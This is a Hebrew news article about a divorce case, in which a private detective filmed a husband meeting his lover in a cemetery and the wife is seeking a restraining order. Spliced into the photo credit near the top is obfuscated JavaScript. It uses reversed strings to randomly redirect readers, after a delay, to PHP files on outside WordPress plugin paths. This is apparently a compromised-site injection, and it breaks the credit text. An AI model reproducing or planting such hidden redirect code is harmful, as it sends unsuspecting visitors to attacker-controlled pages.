fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

גם זה קורה בימי קורונה: הבעל נתפס עם המאהבת בבית העלמין

לאישה הגיע תיעוד מצולם של בעלה עם המאהבת בבית העלמין. באמצעות עו"ד שרין סולן היא מבקשת כעת צו הרחקה נגד בעלה. "מה יגידו הילדים שישמעו איפה אבא שלהם נפגש עם המאהבת"
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

תיק גירושים מעניין הונח לאחרונה על שולחנה של עו"ד שרין סולן. בני זוג בתחילת שנות ה-40 לחייהם, מנהלים בימים אלה מאבק גירושים לאחר שבלש פרטי הנציח את הבעל מבלה עם המאהבת בבית העלמין.

בני הזוג, הורים לשלושה ילדים, נחשבים מצליחים מבחינה כלכלית. הבעל עובד בעסקי הזהב ולאישה יש כמה חנויות למוצרי קוסמטיקה. בתצהיר שהגישה לבית המשפט לענייני משפחה, באמצעות עו"ד שרין סולן, מגוללת האישה את אורח החיים שלהם: "בעלי הרעיף עליי ועל הילדים אהבה במשך שנים. יש לנו מכוניות מפוארות. בית מהיפים ביותר שיש ביישוב ומהיפים בארץ".

לטענת האישה, כל זה לא הפריע לבעלה לפזול פעם אחר פעם למקומות אחרים. "לא עשיתי מזה עניין, כי בסופו של דבר חשבתי שלא יכול להיות שיש לנו הכל מהכל ולשנינו הכנסה שנתית גבוהה מאוד, שזה מה שבאמת קורה", סיפרה האישה.

בגידה בימי קורונה. עו"ד שרין סולן | צילום: יח"צ
עו"ד שרין סולן | צילום: יח"צ

בחודשים האחרונים, חשדה האישה כי משהו ממשי קורה מתחת לאפה. לפני חודשיים, כשבעלה הרבה להיעדר, פנתה לעו"ד סולן ובהתייעצות איתה נשכר בלש פרטי שעקב אחרי הבעל.

באחת הפעמים אמר הבעל לאשתו שהוא הולך לניחום אבלים של חברה לעבודה. אולם, התמונות וסרט הווידיאו שסיפק הבלש הפרטי, הראו כי הבעל אמנם הגיע לבית העלמין, אך לא כדי להתאבל אלא על מנת לבלות עם המאהבת על אחד הספסלים.

בדיקה מעמיקה יותר גילתה לאישה, כי המאהבת כבר יצאה פעמיים לחו"ל עם בעלה והוא אף נתן לה מתנות ותכשיטים. כמו כן התברר לאישה, כי לפני התפרצות הקורונה בעלה נהג לבלות עם המאהבת בצימר ובבית מלון הקרוב ליישוב בו הם מתגוררים.

"מה יגידו הילדים שישמעו איפה אבא שלהם נפגש עם המאהבת", אמרה האישה לעו"ד סולן. כעת היא מבקשת שיוצא צו הרחקה נגד בעלה. הדיון יתקיים בזמן הקרוב בבית הדין לענייני משפחה.

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות